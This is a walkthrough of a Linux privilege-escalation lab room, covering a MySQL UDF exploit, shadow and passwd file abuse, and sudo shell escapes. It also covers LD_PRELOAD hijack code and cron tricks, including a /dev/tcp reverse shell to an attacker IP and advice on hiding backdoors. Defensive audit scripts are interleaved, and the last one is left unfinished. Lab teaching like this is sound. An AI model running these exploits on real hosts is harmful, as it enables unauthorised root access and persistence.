LEARN >> Linux PrivEsc

This room explains some common methods of escalating privileges on Linux systems. This serves as a good place to start if you are stuck as a certain user and need to either upgrade or step laterally to another user.

Task 1 – Deploy the Vulnerable Debian VM

  • Login credentials:

    USER: user
    PASS: password321



Task 2 – Service Exploits

MySQL is running as "root" and the root user on MySQL does not have a password set. We can use a popular exploit that makes use of User Defined Functions (UDFs) to run system commands as root via the MySQL service.

  • Change into the /home/user/tools/mysql-udf directory

  • Compile the raptor_udf2.c exploit using the following commands:

gcc -g -c raptor_udf2.c -fPIC  
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
  • Connect to the MySQL service as root, password is blank:
mysql -u root
  • Execute the following commands on the MySQL shell to create a User Defined Function (UDF) "do_system" using our compiled exploit:
use mysql;  
create table foo(line blob);  
insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));  
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';  
create function do_system returns integer soname 'raptor_udf2.so';
  • Use the below command to copy /bin/bash to /tmp/rootbash and set the SUID permissions:
select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
  • Exit out of MySQL (type exit or \q and press Enter) then run the SUID bash copy /tmp/rootbash with the parameter -p to gain a shell running with root privileges:
/tmp/rootbash -p

The exploit!

user@debian:~$ cd /home/user/tools/mysql-udf
user@debian:~/tools/mysql-udf$ gcc -g -c raptor_udf2.c -fPIC  
user@debian:~/tools/mysql-udf$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
user@debian:~/tools/mysql-udf$ mysql -u root
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 35
Server version: 5.1.73-1+deb6u1 (Debian)

Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> use mysql;  
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> create table foo(line blob);  
Query OK, 0 rows affected (0.27 sec)

mysql> insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));  
Query OK, 1 row affected (0.00 sec)

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';  
Query OK, 1 row affected (0.00 sec)

mysql> create function do_system returns integer soname 'raptor_udf2.so';
Query OK, 0 rows affected (0.00 sec)

mysql> select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
+------------------------------------------------------------------+
| do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash') |
+------------------------------------------------------------------+
|                                                                0 |
+------------------------------------------------------------------+
1 row in set (0.01 sec)

mysql> \q

user@debian:~$ /tmp/rootbash -p
root@debian:/usr/share/man# id
uid=0(root) gid=0(root) groups=0(root)
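
The UDF chain above only works because mysqld runs as root and nothing restricts where LOAD_FILE() and INTO DUMPFILE may read and write. The following is an added example, not part of the room, that checks for exactly those two conditions. It takes text as input so it can be fed live output (ps -eo user,comm and the my.cnf contents) or the constructed samples embedded below, which mirror the room's VM and a corrected configuration; the process listing, config fragments and the /var/lib/mysql-files path are assumptions made up for the example.

```sh
# Added example, not part of the room: a read-only check for the two
# conditions the UDF technique relies on, namely mysqld running as root and
# no secure_file_priv restriction on LOAD_FILE()/INTO DUMPFILE.

# Constructed sample of `ps -eo user,comm` on the vulnerable VM.
PS_WEAK='USER     COMMAND
root     init
root     mysqld_safe
root     mysqld
www-data apache2'

# Constructed sample after the daemon is switched to the mysql account.
PS_FIXED='USER     COMMAND
root     init
mysql    mysqld
www-data apache2'

# Constructed [mysqld] section with neither user= nor secure_file_priv=.
CNF_WEAK='[client]
port = 3306

[mysqld]
datadir = /var/lib/mysql
plugin_dir = /usr/lib/mysql/plugin'

# Corrected configuration: unprivileged daemon account, and file I/O from SQL
# confined to one directory (so a .so cannot be written into plugin_dir).
CNF_FIXED='[mysqld]
user = mysql
datadir = /var/lib/mysql
plugin_dir = /usr/lib/mysql/plugin
secure_file_priv = /var/lib/mysql-files'

# Print the account the mysqld process runs as, or "none" if not running.
mysqld_user() {
    printf '%s\n' "$1" | awk '
        $2 == "mysqld" { print $1; found = 1; exit }
        END            { if (!found) print "none" }'
}

# Print the value of one key from the [mysqld] section, or "unset".
# Dashes in key names are normalised to underscores (secure-file-priv).
mysqld_option() {
    printf '%s\n' "$2" | awk -v key="$1" '
        /^\[/ { in_mysqld = ($0 == "[mysqld]"); next }
        in_mysqld {
            n = index($0, "=")
            if (n == 0) next
            k = substr($0, 1, n - 1); gsub(/[ \t]/, "", k); gsub(/-/, "_", k)
            if (k == key) {
                v = substr($0, n + 1); gsub(/^[ \t]+|[ \t]+$/, "", v)
                print v; found = 1; exit
            }
        }
        END { if (!found) print "unset" }'
}

# Report the findings, one per line, and print their count on the last line.
udf_exposure() {
    findings=0
    user=$(mysqld_user "$1")
    if [ "$user" = "root" ]; then
        echo "finding: mysqld runs as root; set user=mysql under [mysqld]"
        findings=$((findings + 1))
    fi
    priv=$(mysqld_option secure_file_priv "$2")
    if [ "$priv" = "unset" ]; then
        echo "finding: secure_file_priv unset; LOAD_FILE/INTO DUMPFILE can reach any path"
        findings=$((findings + 1))
    fi
    echo "$findings"
}

udf_exposure "$PS_WEAK" "$CNF_WEAK"    # two findings, then 2
udf_exposure "$PS_FIXED" "$CNF_FIXED"  # 0
```

With the daemon running as mysql, the INTO DUMPFILE step fails because /usr/lib/mysql/plugin is root-owned, and with secure_file_priv set the file functions refuse any path outside that directory; either change alone breaks the chain.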

Task 3 – Weak File Permissions – Readable /etc/shadow

A world-readable /etc/shadow file is dangerous… the /etc/shadow file is where Linux stores its users' password hashes. Because the passwords are hashed doesn't mean that we cannot break them… especially if the user has used a simple password…

  • The /etc/shadow file contains user password hashes and is usually readable only by root… note that on this VM it is world-readable:
user@debian:~/tools/mysql-udf$ ls -l /etc/shadow
-rw-r--rw- 1 root shadow 837 Aug 25  2019 /etc/shadow
  • View the contents of the /etc/shadow file:
user@debian:~/tools/mysql-udf$ cat /etc/shadow
root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
daemon:*:17298:0:99999:7:::
bin:*:17298:0:99999:7:::
sys:*:17298:0:99999:7:::
sync:*:17298:0:99999:7:::
games:*:17298:0:99999:7:::
man:*:17298:0:99999:7:::
lp:*:17298:0:99999:7:::
mail:*:17298:0:99999:7:::
news:*:17298:0:99999:7:::
uucp:*:17298:0:99999:7:::
proxy:*:17298:0:99999:7:::
www-data:*:17298:0:99999:7:::
backup:*:17298:0:99999:7:::
list:*:17298:0:99999:7:::
irc:*:17298:0:99999:7:::
gnats:*:17298:0:99999:7:::
nobody:*:17298:0:99999:7:::
libuuid:!:17298:0:99999:7:::
Debian-exim:!:17298:0:99999:7:::
sshd:*:17298:0:99999:7:::
user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjwYpT2O1zrR2xTROv7wRIkF8.:17298:0:99999:7:::
statd:*:17299:0:99999:7:::
mysql:!:18133:0:99999:7:::

Each line represents a user. A user’s password hash (if they have one) can be found between the first and second colons (:) of each line.

  • Save the root user's hash to a file called hash.txt and use John the Ripper to crack it with rockyou.txt – the famous plaintext password list with over 14 million commonly used passwords:
❯ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt                   
Warning: detected hash type "sha512crypt", but the string is also recognized as "sha512crypt-opencl"
Use the "--format=sha512crypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password123      (root)
1g 0:00:00:01 DONE (2021-11-24 16:57) 0.8547g/s 1312p/s 1312c/s 1312C/s cuties..mexico1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
  • Switch to the root user, using the cracked password:
user@debian:~/tools/mysql-udf$ su root
Password: 
root@debian:/home/user/tools/mysql-udf#




Task 4 – Weak File Permissions – Writeable /etc/shadow

As much as a world-readable /etc/shadow file is dangerous… a world-writeable /etc/shadow file is 100x worse… it allows ANYONE with access to modify ANY password stored in this file. In 3 easy steps we can overwrite the root user's password with whatever we want, and no one would be the wiser (until someone tries to access that root account with the old password, anyway…)

  • The /etc/shadow file on this VM is world-writeable:
user@debian:~/tools/mysql-udf$ ls -l /etc/shadow
-rw-r--rw- 1 root shadow 837 Aug 25  2019 /etc/shadow
  • Generate a new password hash with a password of your choice:
user@debian:~/tools/mysql-udf$ mkpasswd -m sha-512 pwn3d
$6$w1DLfTWkp2iep$P1rdUJ.aGUsX1v66DRwjMI.HKipURmgJ9rq7uQcKhRFZPzDtHgIU7yE09YbWPicDffVyW8AVx/y20xHvAnLxO0
  • Edit the /etc/shadow file and replace the original root hash with the one generated above, then switch to root:
user@debian:~/tools/mysql-udf$ vi /etc/shadow
"/etc/shadow" 24L, 842C written
user@debian:~/tools/mysql-udf$ su root
Password: 
root@debian:/home/user/tools/mysql-udf#

Task 5 – Weak File Permissions – Writeable /etc/passwd

The /etc/passwd file contains information about user accounts. It is world-readable by default, but is usually only writeable by root. Historically, the /etc/passwd file contained the users password hashes, and some versions of Linux still allow password hashes to be stored there.

  • Note that the /etc/passwd file is world-writeable:
user@debian:~/tools$ ls -l /etc/passwd
-rw-r--rw- 1 root root 1009 Aug 25  2019 /etc/passwd
  • Generate a new password hash with a password of your choice:
user@debian:~/tools$ openssl passwd l33t
XlfiGiQKUvlVE
  • Edit the /etc/passwd file and either replace the x between the first and second colon on the root account line, or better still copy the whole line to the bottom of the file, change root to something else and paste the generated hash between the first and second colons:
stimpz:XlfiGiQKUvlVE:0:0:root:/root:/bin/bash

"/etc/passwd" 25L, 1055C written

user@debian:~/tools$ su stimpz
Password: 
root@debian:/home/user/tools# id
uid=0(root) gid=0(root) groups=0(root)
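
Tasks 3, 4 and 5 all come down to three things an auditor can check on any host: the modes of /etc/passwd and /etc/shadow, hashes or empty password fields where they should not be, and a second UID 0 account like the "stimpz" line above. The following is an added example, not part of the room, that performs those checks. It runs here against constructed copies of the two files written to a temporary directory (the placeholder hashes and the "guest" account are made up for the example); pointed at the real files it is simply audit_accounts /etc/passwd /etc/shadow.

```sh
# Added example, not part of the room: audit passwd/shadow-format files for
# the weaknesses used in Tasks 3-5 (permissions, hashes kept in passwd,
# empty passwords, extra UID 0 accounts).

SAMPLE_DIR=$(mktemp -d)
trap 'rm -rf "$SAMPLE_DIR"' EXIT

# Constructed passwd: the "stimpz" line mirrors the one added in Task 5.
cat > "$SAMPLE_DIR/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
user:x:1000:1000:user,,,:/home/user:/bin/bash
stimpz:XlfiGiQKUvlVE:0:0:root:/root:/bin/bash
EOF

# Constructed shadow with placeholder hashes and one passwordless account.
cat > "$SAMPLE_DIR/shadow" <<'EOF'
root:$6$placeholder$placeholderhash:17298:0:99999:7:::
daemon:*:17298:0:99999:7:::
user:$6$placeholder$placeholderhash:17298:0:99999:7:::
guest::17298:0:99999:7:::
EOF

# Same mode as on the room's VM (-rw-r--rw-); correct values are 644 and 640.
chmod 646 "$SAMPLE_DIR/passwd" "$SAMPLE_DIR/shadow"

# Report group/other write access on a file, and other-read access when the
# second argument is "secret". Parses the ls -l mode string for portability.
check_mode() {
    mode=$(ls -l "$1" | cut -c1-10)
    case $mode in
        ?????w????|????????w?) echo "$1: writable by group or other ($mode)" ;;
    esac
    if [ "$2" = secret ]; then
        case $mode in
            ???????r??) echo "$1: readable by other ($mode)" ;;
        esac
    fi
    return 0
}

# UID 0 accounts other than root.
extra_uid0() { awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"; }

# passwd entries whose password field is not the "x" shadow marker.
passwd_with_hash() { awk -F: '$2 != "x" && $2 != "*" { print $1 }' "$1"; }

# shadow entries with an empty password field (no password needed to log in).
shadow_empty() { awk -F: '$2 == "" { print $1 }' "$1"; }

# One line per finding.
audit_accounts() {
    check_mode "$1"
    check_mode "$2" secret
    for u in $(extra_uid0 "$1");       do echo "$1: extra UID 0 account: $u"; done
    for u in $(passwd_with_hash "$1"); do echo "$1: password hash stored in passwd for: $u"; done
    for u in $(shadow_empty "$2");     do echo "$2: empty password for: $u"; done
    return 0
}

audit_accounts "$SAMPLE_DIR/passwd" "$SAMPLE_DIR/shadow"   # six findings
```

The UID check catches the Task 5 technique even when the attacker leaves root's own line untouched, which is why it is worth more than diffing the root entry alone.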


Task 6 – Sudo – Shell Escape Sequences

  • List the programs which sudo allows your user to run:
user@debian:~/tools$ sudo -l
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/nano
    (root) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: /usr/bin/man
    (root) NOPASSWD: /usr/bin/awk
    (root) NOPASSWD: /usr/bin/less
    (root) NOPASSWD: /usr/bin/ftp
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/sbin/apache2
    (root) NOPASSWD: /bin/more
  • Use GTFOBins and search for the program names; if a program is listed with "sudo" as a function, you can use it to elevate privileges, usually via an escape sequence.

For an extra challenge, try to gain a root shell using all the programs on the list!

iftop

user@debian:~$ sudo iftop
interface: eth0
IP address is: 10.10.127.35
MAC address is: 02:2c:1a:3c:85:ff

!/bin/bash

root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
root@debian:/home/user# 

find

user@debian:~$ sudo find . -exec /bin/bash \; -quit
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)

nano

user@debian:~$ sudo nano

Ctrl-R / Ctrl-X
reset; bash 1>&0 2>&0

root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)

vim

user@debian:~$ sudo vim -c ':!/bin/bash'

root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)

man

user@debian:~$ sudo man man

!/bin/bash

root@debian:/usr/share/man# id
uid=0(root) gid=0(root) groups=0(root)

awk

user@debian:~$ sudo awk 'BEGIN {system("/bin/bash")}'
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)

less

user@debian:~$ sudo less /etc/profile

!/bin/bash

root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)

ftp

user@debian:~$ sudo ftp
ftp> !/bin/bash
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)

nmap

user@debian:~$ sudo nmap --interactive

Starting Nmap V. 5.00 ( http://nmap.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !/bin/bash
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)

/bin/more

user@debian:~$ TERM= sudo more /etc/profile

!/bin/bash   

root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)

NOTE: the apache2 sudo method is covered in the topic below, it’s not your usual standard shell escape GTFOBins-style exploit.




Task 7 – Sudo – Environment Variables

Sudo can be configured to inherit certain environment variables from the user’s environment.

  • Check which environment variables are inherited (look for the env_keep options):
user@debian:~$ sudo -l
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/nano
    (root) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: /usr/bin/man
    (root) NOPASSWD: /usr/bin/awk
    (root) NOPASSWD: /usr/bin/less
    (root) NOPASSWD: /usr/bin/ftp
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/sbin/apache2
    (root) NOPASSWD: /bin/more

LD_PRELOAD and LD_LIBRARY_PATH are both inherited from the user’s environment. LD_PRELOAD loads a shared object before any others when a program is run. LD_LIBRARY_PATH provides a list of directories where shared libraries are searched for first.

  • Create a shared object using the code located at /home/user/tools/sudo/preload.c:
user@debian:~$ gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c
user@debian:~$ 
  • Run one of the programs you are allowed to run via sudo, while setting the LD_PRELOAD environment variable to the full path of the new shared object:
user@debian:~$ sudo LD_PRELOAD=/tmp/preload.so apache2
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
  • Run ldd /usr/sbin/apache2:
user@debian:~$ ldd /usr/sbin/apache2
    linux-vdso.so.1 =>  (0x00007fffe3bb4000)
    libpcre.so.3 => /lib/x86_64-linux-gnu/libpcre.so.3 (0x00007fd7c7843000)
    libaprutil-1.so.0 => /usr/lib/libaprutil-1.so.0 (0x00007fd7c761f000)
    libapr-1.so.0 => /usr/lib/libapr-1.so.0 (0x00007fd7c73e5000)
    libpthread.so.0 => /lib/libpthread.so.0 (0x00007fd7c71c9000)
    libc.so.6 => /lib/libc.so.6 (0x00007fd7c6e5d000)
    libuuid.so.1 => /lib/libuuid.so.1 (0x00007fd7c6c58000)
    librt.so.1 => /lib/librt.so.1 (0x00007fd7c6a50000)
    libcrypt.so.1 => /lib/libcrypt.so.1 (0x00007fd7c6819000)
    libdl.so.2 => /lib/libdl.so.2 (0x00007fd7c6614000)
    libexpat.so.1 => /usr/lib/libexpat.so.1 (0x00007fd7c63ec000)
    /lib64/ld-linux-x86-64.so.2 (0x00007fd7c7d00000)
  • Create a shared object with the same name as one of the listed libraries (libcrypt.so.1) using the code located at /home/user/tools/sudo/library_path.c:
user@debian:~$ gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c
user@debian:~$ 
  • Run apache2 using sudo, while setting the LD_LIBRARY_PATH environment variable to /tmp (where we output the compiled shared object):
user@debian:~$ sudo LD_LIBRARY_PATH=/tmp apache2
apache2: /tmp/libcrypt.so.1: no version information available (required by /usr/lib/libaprutil-1.so.0)
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)

A root shell should spawn.

  • Try renaming /tmp/libcrypt.so.1 to the name of another library used by apache2 and re-run apache2 using sudo again. Did it work? If not, try to figure out why not, and how the library_path.c code could be changed to make it work.
user@debian:~/tools/sudo$ mv /tmp/libcrypt.so.1 /tmp/libpcre.so.3
user@debian:~/tools/sudo$ sudo LD_LIBRARY_PATH=/tmp apache2
apache2: symbol lookup error: apache2: undefined symbol: pcre_free
user@debian:~/tools/sudo$ mv /tmp/libpcre.so.3 /tmp/libuuid.so.1
user@debian:~/tools/sudo$ sudo LD_LIBRARY_PATH=/tmp apache2
apache2: /tmp/libuuid.so.1: no version information available (required by /usr/lib/libapr-1.so.0)
root@debian:/home/user/tools/sudo# id
uid=0(root) gid=0(root) groups=0(root)

SOURCE >> library_path.c

#define _GNU_SOURCE          /* setresuid() is a GNU extension */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Marked as a constructor so it runs as soon as the loader maps the object */
static void hijack() __attribute__((constructor));

void hijack() {
    unsetenv("LD_LIBRARY_PATH");   /* the spawned shell should load the real libraries */
    setresuid(0,0,0);              /* real, effective and saved UID to root */
    system("/bin/bash -p");
}

SOURCE >> preload.c

#define _GNU_SOURCE          /* setresuid() is a GNU extension */
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

/* _init runs when the object is loaded; compiled with -nostartfiles so the
   default _init is not linked in and this one takes its place */
void _init() {
    unsetenv("LD_PRELOAD");        /* the spawned shell should not reload this object */
    setresuid(0,0,0);
    system("/bin/bash -p");
}

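Tasks 6 and 7 both start from the same sudo -l listing: the NOPASSWD rules name programs that hand out a shell, and env_keep passes the dynamic loader's variables through to whatever runs as root. The following is an added example, not part of the room, that audits such a listing for both. The constructed weak sample reproduces the room's output; the hardened sample, the secure_path value in it and the SHELL_CAPABLE list (drawn from the programs the room itself escapes from) are assumptions. It handles the env_keep+=VAR form shown on the page, not quoted lists. Live use is audit_sudo "$(sudo -l)".

```sh
# Added example, not part of the room: audit `sudo -l` output for loader
# variables kept by env_keep and for NOPASSWD programs that can spawn a shell.

SUDO_L_WEAK='Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/nano
    (root) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: /usr/bin/man
    (root) NOPASSWD: /usr/bin/awk
    (root) NOPASSWD: /usr/bin/less
    (root) NOPASSWD: /usr/bin/ftp
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/sbin/apache2
    (root) NOPASSWD: /bin/more'

# Constructed hardened equivalent: env_reset with no loader variables kept,
# a fixed secure_path, and only the service binary left (password required).
SUDO_L_FIXED='Matching Defaults entries for user on this host:
    env_reset, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User user may run the following commands on this host:
    (root) /usr/sbin/apache2'

# Assumed list of programs known to offer a shell escape (see GTFOBins).
SHELL_CAPABLE='awk find ftp iftop less man more nano nmap vi vim'

# env_keep entries that reach the dynamic loader.
risky_env_keep() {
    printf '%s\n' "$1" | tr ',' '\n' | awk '
        sub(/^[ \t]*env_keep[+]?=/, "") && $0 ~ /^LD_/ { print }'
}

# Commands runnable as root without a password (arguments retained).
nopasswd_cmds() {
    printf '%s\n' "$1" | awk '
        /^[ \t]*\(root\)[ \t]+NOPASSWD:/ { sub(/^.*NOPASSWD:[ \t]*/, ""); print }'
}

# NOPASSWD commands whose program is on the shell-capable list.
flag_shell_capable() {
    nopasswd_cmds "$1" | while IFS= read -r cmd; do
        prog=${cmd%% *}        # drop arguments
        prog=${prog##*/}       # basename
        case " $SHELL_CAPABLE " in
            *" $prog "*) echo "$cmd: can spawn a shell (see GTFOBins); remove or replace" ;;
        esac
    done
    return 0
}

audit_sudo() {
    for v in $(risky_env_keep "$1"); do
        echo "env_keep passes $v to root-run programs; drop it and rely on env_reset"
    done
    flag_shell_capable "$1"
}

audit_sudo "$SUDO_L_WEAK"   # 2 env_keep findings + 10 program findings
audit_sudo "$SUDO_L_FIXED"  # prints nothing
```

apache2 is not flagged here because it offers no shell escape of its own; the room reaches root through it only via the kept LD_PRELOAD and LD_LIBRARY_PATH variables, which the first check reports.
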
Task 8 – Cron Jobs – File Permissions

Cron jobs are programs or scripts which users can schedule to run at specific times or intervals. Cron table files (crontabs) store the configuration for cron jobs. The system-wide crontab is located at /etc/crontab.

  • View the contents of the system-wide crontab:
user@debian:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh

There should be two cron jobs scheduled to run every minute. One runs overwrite.sh, the other runs /usr/local/bin/compress.sh

  • Locate the full path of the overwrite.sh file:
user@debian:~$ locate overwrite.sh
/usr/local/bin/overwrite.sh
  • Note that the file is world-writeable:
user@debian:~$ ls -l /usr/local/bin/overwrite.sh
-rwxr--rw- 1 root staff 40 May 13  2017 /usr/local/bin/overwrite.sh
  • Replace the contents of the overwrite.sh file with the following (change the IP to your VPN IP and the port to match), then open up a netcat listener on your attack box using the port given below:
user@debian:/usr/local/bin$ echo '#!/bin/bash' > overwrite.sh
user@debian:/usr/local/bin$ echo 'bash -i >& /dev/tcp/10.9.2.201/1337 0>&1' >> overwrite.sh
user@debian:/usr/local/bin$ cat overwrite.sh 
#!/bin/bash
bash -i >& /dev/tcp/10.9.2.201/1337 0>&1
user@debian:/usr/local/bin$ 

❯ nc -lnvp 1337
Connection from 10.10.200.127:34634
bash: no job control in this shell
root@debian:~# id
id
uid=0(root) gid=0(root) groups=0(root)

NOTE: Skipping that first echo command leaves the original code in the file instead of clearing it out… this makes it "less obvious" that something has been backdoored, and is the preferred way of sneaking in a backdoor in real-life circumstances. This matters especially when using the above command to spawn a shell, as it stops the script from running any further until that shell dies. This task however explicitly says to "Replace the contents", so here you must include that first echo to overwrite the contents of the file.


Task 9 – Cron Jobs – PATH Environment Variable

  • View the contents of the system-wide crontab /etc/crontab:
user@debian:/usr/local/bin$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh
  • Notice that the PATH includes the directory /home/user at the front? Because the line calling overwrite.sh does not give a path, we can create our own malicious overwrite.sh and drop it in our home folder (which comes before /usr/local/bin, the full path of the real overwrite.sh, so ours will run first)!
user@debian:~$ echo '#!/bin/bash' > ~/overwrite.sh
user@debian:~$ echo 'cp /bin/bash /tmp/rootbash' >> ~/overwrite.sh
user@debian:~$ echo 'chmod +xs /tmp/rootbash' >> ~/overwrite.sh
user@debian:~$ cat overwrite.sh
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash
user@debian:~$ chmod +x overwrite.sh
user@debian:~$ ls /tmp/rootbash
ls: cannot access /tmp/rootbash: No such file or directory
...
user@debian:~$ ls -l /tmp/rootbash
-rwsr-sr-x 1 root root 926536 Nov 24 03:20 /tmp/rootbash
  • Now to get a root shell, simply run /tmp/rootbash -p:
user@debian:~$ /tmp/rootbash -p
rootbash-4.1# id
uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
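
Tasks 8 and 9 are both configuration defects in /etc/crontab that can be checked mechanically: a PATH entry under a user's home, a job command given without an absolute path, and a job script writable by someone other than root. The following is an added example, not part of the room, that performs those checks. The weak crontab is a constructed copy of the room's; the corrected crontab and the temporary script file (given the -rwxr--rw- mode seen on overwrite.sh) are assumptions. On a live host run audit_crontab "$(cat /etc/crontab)" and the mode check against the real script.

```sh
# Added example, not part of the room: audit a system crontab for a
# user-controlled PATH entry, PATH-resolved commands and writable job scripts.

CRONTAB_WEAK='SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh'

# Corrected: no user-controlled directory in PATH, every command absolute.
CRONTAB_FIXED='SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * * root /usr/local/bin/overwrite.sh
* * * * * root /usr/local/bin/compress.sh'

# PATH directories that are not standard system directories.
cron_path_outside_system() {
    printf '%s\n' "$1" | awk -F= '/^PATH=/ { n = split($2, d, ":"); for (i = 1; i <= n; i++) print d[i] }' |
    while IFS= read -r dir; do
        case $dir in
            /bin|/sbin|/usr/bin|/usr/sbin|/usr/local/bin|/usr/local/sbin) ;;
            *) echo "$dir" ;;
        esac
    done
    return 0
}

# Job commands resolved through PATH rather than given absolutely.
# Shell builtins that commonly open a command string are ignored.
cron_relative_commands() {
    printf '%s\n' "$1" | awk '
        /^[ \t]*#/ || /^[ \t]*$/ || /^[A-Za-z_]+=/ { next }
        NF >= 7 { print $6, $7 }' |
    while read -r user cmd; do
        case $cmd in
            /*|cd|test|\[) ;;
            *) echo "$user: $cmd" ;;
        esac
    done
    return 0
}

# True when a script a root job runs is writable by group or other.
script_group_or_other_writable() {
    [ -n "$(find "$1" -prune \( -perm -020 -o -perm -002 \) -print)" ]
}

audit_crontab() {
    for d in $(cron_path_outside_system "$1"); do
        echo "PATH entry $d is outside the system directories; remove it"
    done
    cron_relative_commands "$1" | while IFS= read -r line; do
        echo "job '$line' is resolved through PATH; use an absolute path"
    done
    return 0
}

# Constructed stand-in for /usr/local/bin/overwrite.sh with the VM's mode.
TMP_SCRIPT=$(mktemp)
trap 'rm -f "$TMP_SCRIPT"' EXIT
chmod 746 "$TMP_SCRIPT"   # -rwxr--rw-

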